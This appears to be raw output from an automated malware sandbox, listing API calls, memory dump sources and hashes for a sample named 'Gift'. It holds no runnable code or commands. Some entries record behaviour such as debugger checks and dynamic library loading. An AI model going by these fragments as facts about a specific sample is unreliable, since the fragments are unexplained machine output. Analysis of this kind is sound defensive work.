                                                                          • Instruction Fuzzy Hash: 4161D071620209DBDF048F2AD8806AABBB9FF44350F9485B9EC19CF295EB35D970CB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E59F9
                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E5A9E
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002E5ABB
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$_memset
                                                                          • String ID:
                                                                          • API String ID: 1505330794-0
                                                                          • Opcode ID: 95e7162f5fdee275e0a49174c64b5393c61035a4ba860ea56b0b25a8528da032
                                                                          • Instruction ID: 17a747d2c332ade63051cade85bc47a64e71c75c52f1521758f2fd92be76b651
                                                                          • Opcode Fuzzy Hash: 95e7162f5fdee275e0a49174c64b5393c61035a4ba860ea56b0b25a8528da032
                                                                          • Instruction Fuzzy Hash: 6431A0B05357518FD721DF25D884697BBE8FB48308F400E3EF59A82281E7716954CB92
                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 002F5953
                                                                            • Part of subcall function 002FA39B: __NMSG_WRITE.LIBCMT ref: 002FA3C2
                                                                            • Part of subcall function 002FA39B: __NMSG_WRITE.LIBCMT ref: 002FA3CC
                                                                          • __NMSG_WRITE.LIBCMT ref: 002F595A
                                                                            • Part of subcall function 002FA3F8: GetModuleFileNameW.KERNEL32(00000000,003953BA,00000104,00000004,00000001,002F1003), ref: 002FA48A
                                                                            • Part of subcall function 002FA3F8: ___crtMessageBoxW.LIBCMT ref: 002FA538
                                                                            • Part of subcall function 002F32CF: ___crtCorExitProcess.LIBCMT ref: 002F32D5
                                                                            • Part of subcall function 002F32CF: ExitProcess.KERNEL32 ref: 002F32DE
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • RtlAllocateHeap.NTDLL(01360000,00000000,00000001,?,00000004,?,?,002F1003,?), ref: 002F597F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 1372826849-0
                                                                          • Opcode ID: fd133f2978df89e888e22a77d703eaee6c79da73347be969e82d8ae335db23f9
                                                                          • Instruction ID: 08049371771fa476f505db1ac9e58b7b685c95dae1298565a0388992bb5db79d
                                                                          • Opcode Fuzzy Hash: fd133f2978df89e888e22a77d703eaee6c79da73347be969e82d8ae335db23f9
                                                                          • Instruction Fuzzy Hash: F001D632331B2FDAE61A6B34AC0263EF2489F427F0F500436F7159A291DEF08D604BA1
                                                                          APIs
                                                                          • _free.LIBCMT ref: 003392D6
                                                                            • Part of subcall function 002F2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2F99
                                                                            • Part of subcall function 002F2F85: GetLastError.KERNEL32(00000000,?,002F9C54,00000000,002F8D5D,002F59C3), ref: 002F2FAB
                                                                          • _free.LIBCMT ref: 003392E7
                                                                          • _free.LIBCMT ref: 003392F9
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                          • Instruction ID: 98de821e262c3a0308486d8dffd80f561dd9d032b4e55193189e940b010d543c
                                                                          • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                          • Instruction Fuzzy Hash: F6E0C2A1624A06D7CA20A5386880FE3B7EC0F88391B260A2EB509D3542CE60E8408528
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CALL
                                                                          • API String ID: 0-4196123274
                                                                          • Opcode ID: f4ed37f26e24997472eb2d3de92a7c097831a2c6d59f250166005f75d9674b82
                                                                          • Instruction ID: 26b05b5b43a0a1c4519ea518d7599c55f5f17ae9232177c1d81cf693fdfafa70
                                                                          • Opcode Fuzzy Hash: f4ed37f26e24997472eb2d3de92a7c097831a2c6d59f250166005f75d9674b82
                                                                          • Instruction Fuzzy Hash: F4328B74628352DFC725DF14C494A2AB7E1BF85304F15896EF88A8B362C771EC65CB82
                                                                          APIs
                                                                          • _strcat.LIBCMT ref: 0034E20C
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • _wcscpy.LIBCMT ref: 0034E29B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1012013722-0
                                                                          • Opcode ID: 61c7baa22af269f9b637d439d4f9804230f9b3d454ca5950a787c6faf078ba9b
                                                                          • Instruction ID: 97403cf5eac0c21378509759138f12395596f62cde560ce304937c6ae036da0b
                                                                          • Opcode Fuzzy Hash: 61c7baa22af269f9b637d439d4f9804230f9b3d454ca5950a787c6faf078ba9b
                                                                          • Instruction Fuzzy Hash: 6E913939A10614DFCB1AEF18C5819A9B7E5FF59310B5580AAE84A8F762DB30FD51CF80
                                                                          APIs
                                                                          • _memmove.LIBCMT ref: 003368EC
                                                                          • _memmove.LIBCMT ref: 0033690A
                                                                            • Part of subcall function 00336A73: _memmove.LIBCMT ref: 00336B01
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                          • Instruction ID: 656f393a9029144594ff872be6b303278110b4488c2f353d6141b60174b0bc7d
                                                                          • Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
                                                                          • Instruction Fuzzy Hash: 3371B3B0200604AFCB26AF14C8C6B6ABBB5EF84324F25C51DECD52B792CB75AD51CB50
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0033614E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower
                                                                          • String ID:
                                                                          • API String ID: 2358735015-0
                                                                          • Opcode ID: c914bec243eed725e10fe0a5988e0aa463466b3b32df53fd076291a023babe2d
                                                                          • Instruction ID: 2de34414ed46460c6be434507be11d3b96637a0e10811316f8c3916b348696bd
                                                                          • Opcode Fuzzy Hash: c914bec243eed725e10fe0a5988e0aa463466b3b32df53fd076291a023babe2d
                                                                          • Instruction Fuzzy Hash: 65418576900209AFDB22DF64C8C29AFB7BCEB44350F15863EE516D7251EB709A54CB50
                                                                          APIs
                                                                          • FindCloseChangeNotification.KERNEL32 ref: 002F0ED5
                                                                          • LoadLibraryExW.KERNELBASE ref: 002F0EE7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseFindLibraryLoadNotification
                                                                          • String ID:
                                                                          • API String ID: 1525634188-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 86f15f1ec7ad2432eb1b083b6ecdb1504f342084df1981d63f7cf83d46ca8af1
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: CE31D570A1010EDBD718DF18C4C0979F7A6FF49380B648AA5E609CB652EB71EDE1CB80
                                                                          APIs
                                                                          • IsThemeActive.UXTHEME ref: 002E5FEF
                                                                            • Part of subcall function 002F359C: __lock.LIBCMT ref: 002F35A2
                                                                            • Part of subcall function 002F359C: DecodePointer.KERNEL32(00000001,?,002E6004,00328892), ref: 002F35AE
                                                                            • Part of subcall function 002F359C: EncodePointer.KERNEL32(?,?,002E6004,00328892), ref: 002F35B9
                                                                            • Part of subcall function 002E5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002E5F18
                                                                            • Part of subcall function 002E5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E5F2D
                                                                            • Part of subcall function 002E5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002E526C
                                                                            • Part of subcall function 002E5240: IsDebuggerPresent.KERNEL32 ref: 002E527E
                                                                            • Part of subcall function 002E5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002E52E6
                                                                            • Part of subcall function 002E5240: SetCurrentDirectoryW.KERNEL32(?), ref: 002E5366
                                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 002E602F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                          • String ID:
                                                                          • API String ID: 1438897964-0
                                                                          • Opcode ID: 8c4b767bbc223c93a99db48fe7b6966889273d58aab46d008a03dd4abd52ca4c
                                                                          • Instruction ID: 83cda31918409bf01d0659360a5008dfcf8b70196ac117f924d1fed80f84b8e8
                                                                          • Opcode Fuzzy Hash: 8c4b767bbc223c93a99db48fe7b6966889273d58aab46d008a03dd4abd52ca4c
                                                                          • Instruction Fuzzy Hash: D4118E718283119BC712EF69EC0594ABBFCFF99750F40491BF484872A1DBB19954CF92
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __lock_file_memset
                                                                          • String ID:
                                                                          • API String ID: 26237723-0
                                                                          • Opcode ID: f3fe967086261dd549e53f285b477a63c195f71ee8c8b9a9590adae648132723
                                                                          • Instruction ID: a49e9f642b041fda5f8a0b703beda88f0d4b02bc5f9b1b784fa7a06e077bd875
                                                                          • Opcode Fuzzy Hash: f3fe967086261dd549e53f285b477a63c195f71ee8c8b9a9590adae648132723
                                                                          • Instruction Fuzzy Hash: DD017571820A1DEBCF11AF65CC019AEFBA1AF403E0F144135BB245B161D7318A71DF51
                                                                          APIs
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          • __lock_file.LIBCMT ref: 002F560B
                                                                            • Part of subcall function 002F6E3E: __lock.LIBCMT ref: 002F6E61
                                                                          • __fclose_nolock.LIBCMT ref: 002F5616
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2800547568-0
                                                                          • Opcode ID: 07736779575b7404ed7d97d6206539485092a1378c0ecb6153f65bed5cccb51b
                                                                          • Instruction ID: 97d98c3f031f03b6d6215b6d5c0d4150055d07523e44a70b99982949afb695c5
                                                                          • Opcode Fuzzy Hash: 07736779575b7404ed7d97d6206539485092a1378c0ecb6153f65bed5cccb51b
                                                                          • Instruction Fuzzy Hash: 79F0F072831B2D9AD7106F758802B7EE7E1AF403F4F508229E728AB1C1CBBC49218F51
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 002F5EB4
                                                                          • __ftell_nolock.LIBCMT ref: 002F5EBF
                                                                            • Part of subcall function 002F8D58: __getptd_noexit.LIBCMT ref: 002F8D58
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2999321469-0
                                                                          • Opcode ID: 35bdafa5490777c80b506beb0518b606929d42fb6de6fc39404871a1cf41366f
                                                                          • Instruction ID: e1134f0c722efb5610eb1af6c57efec6584e28427bd17e54f4083034b1c66fb1
                                                                          • Opcode Fuzzy Hash: 35bdafa5490777c80b506beb0518b606929d42fb6de6fc39404871a1cf41366f
                                                                          • Instruction Fuzzy Hash: 40F0A732931A2D9ADB00BB74880377EF6A06F113B5F114225E224EB1C1CFB84A229F51
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5AEF
                                                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 002E5B1F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell__memset
                                                                          • String ID:
                                                                          • API String ID: 928536360-0
                                                                          • Opcode ID: 369625dfc68c41c28887fff0364339810afc98021ffc4b88b0e97cd17e7b82a0
                                                                          • Instruction ID: 7899344e9b9b0a4a23955837f40e66a3b74334ef4db8f46c87af8aba01a5e896
                                                                          • Opcode Fuzzy Hash: 369625dfc68c41c28887fff0364339810afc98021ffc4b88b0e97cd17e7b82a0
                                                                          • Instruction Fuzzy Hash: 55F082708283189BE7A39B249C467E677BC970030CF0005EAAA4896296DB720B98CF55
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString$__swprintf
                                                                          • String ID:
                                                                          • API String ID: 207118244-0
                                                                          • Opcode ID: 0d107e4b607b5f072564c7f1c4c936ed5805ae4bc352184c50d00f2a7dc98201
                                                                          • Instruction ID: 20363d6d9fc1a993d399b3fc58f7dfa1e944d477bf4e7b2bf7ff2dcc19c10666
                                                                          • Opcode Fuzzy Hash: 0d107e4b607b5f072564c7f1c4c936ed5805ae4bc352184c50d00f2a7dc98201
                                                                          • Instruction Fuzzy Hash: C5B16A34A1110AEFCB15EFA4C891DEEB7B5FF48310F15901AF915AB291EB30A952CF90
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fdba8c9f7d907157de91e1d6aa9b9b599825c043f3ba9d446b60e6c245ab014
                                                                          • Instruction ID: ecdcb318a188e13267fb8c482b24efe7ea1f6d5d0827406a68c83f619da85eaf
                                                                          • Opcode Fuzzy Hash: 8fdba8c9f7d907157de91e1d6aa9b9b599825c043f3ba9d446b60e6c245ab014
                                                                          • Instruction Fuzzy Hash: 9B61CB70610606DFCB14DF64C891EBAB7E9EF08310F15856EE9168B391D7B4EDA0CB52
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 7ef1eefb64bbea71f21a4bed7fe8ced150f46f3a70fbe4061ebaf80c1ff72c63
                                                                          • Instruction ID: 2959bb8b0575a56112a407b4eac687cb8aec2bf81f1d6fb720bddf74aaaa4d19
                                                                          • Opcode Fuzzy Hash: 7ef1eefb64bbea71f21a4bed7fe8ced150f46f3a70fbe4061ebaf80c1ff72c63
                                                                          • Instruction Fuzzy Hash: 3A31C079264643DFC724DF1AD484A21F7E0FF08351B94C569E98A8B795DB70E8A1CB80
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 39a1c94fbd322ea37826a03cb0eafe234b45eaedaaa43e739984eeb802a81d68
                                                                          • Instruction ID: 146d86d5325c8f8dab69162ed58353d86936b2bcdcdb1598f85cd9917d38742d
                                                                          • Opcode Fuzzy Hash: 39a1c94fbd322ea37826a03cb0eafe234b45eaedaaa43e739984eeb802a81d68
                                                                          • Instruction Fuzzy Hash: 94411574618351DFDB25CF14C498B1ABBE1BF45308F0988ADE8899B362C771EC95CB52
                                                                          APIs
                                                                            • Part of subcall function 002E4B29: FreeLibrary.KERNEL32(00000000,?), ref: 002E4B63
                                                                            • Part of subcall function 002F547B: __wfsopen.LIBCMT ref: 002F5486
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002E27AF,?,00000001), ref: 002E49F4
                                                                            • Part of subcall function 002E4ADE: FreeLibrary.KERNEL32(00000000), ref: 002E4B18
                                                                            • Part of subcall function 002E48B0: _memmove.LIBCMT ref: 002E48FA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
